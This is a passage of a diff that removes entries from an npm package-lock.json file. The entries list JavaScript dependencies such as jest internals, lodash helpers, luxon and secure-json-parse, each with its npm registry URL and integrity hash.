">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-bignum": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/json-bignum/-/json-bignum-0.0.3.tgz", - "integrity": "sha512-2WHyXj3OfHSgNyuzDbSxI1w2jgw5gkWSWhS7Qg4bWXx1nLk3jnbwfUeS0PSba3IzpTUWdHxBieELUzXRjQB2zg==", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash.camelcase": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", - "integrity": "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==", - "license": "MIT" - }, - "node_modules/lodash.chunk": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/lodash.chunk/-/lodash.chunk-4.2.0.tgz", - "integrity": "sha512-ZzydJKfUHJwHa+hF5X66zLFCBrWn5GeF28OHEr4WVWtNDXlQ/IjWKPBiikqKo2ne0+v6JgCgJ0GzJp8k8bHC7w==" - }, - "node_modules/lodash.flatmap": { - "version": "4.5.0", - "resolved": "https://registry.npmjs.org/lodash.flatmap/-/lodash.flatmap-4.5.0.tgz", - "integrity": "sha512-/OcpcAGWlrZyoHGeHh3cAoa6nGdX6QYtmzNP84Jqol6UEQQ2gIaU3H+0eICcjcKGl0/XF8LWOujNn9lffsnaOg==" - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/luxon": { - "version": "3.6.1", - "resolved": "https://registry.npmjs.org/luxon/-/luxon-3.6.1.tgz", - "integrity": "sha512-tJLxrKJhO2ukZ5z0gyjY1zPh3Rh88Ej9P7jNrZiHMUXHae1yvI2imgOZtL1TO8TW6biMMKfTtAOoEJANgtWBMQ==", - "license": "MIT", - "engines": { - "node": ">=12" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/ms": { - "version": "2.1.3", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", - "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", - "license": "MIT" - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "dependencies": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/secure-json-parse": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/secure-json-parse/-/secure-json-parse-3.0.2.tgz", - "integrity": "sha512-H6nS2o8bWfpFEV6U38sOSjS7bTbdgbCGU9wEM6W14P5H0QOsz94KCusifV44GpHDTu2nqZbuDNhTzu+mjDSw1w==", - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/fastify" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fastify" - } - ], - "license": "BSD-3-Clause" - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - 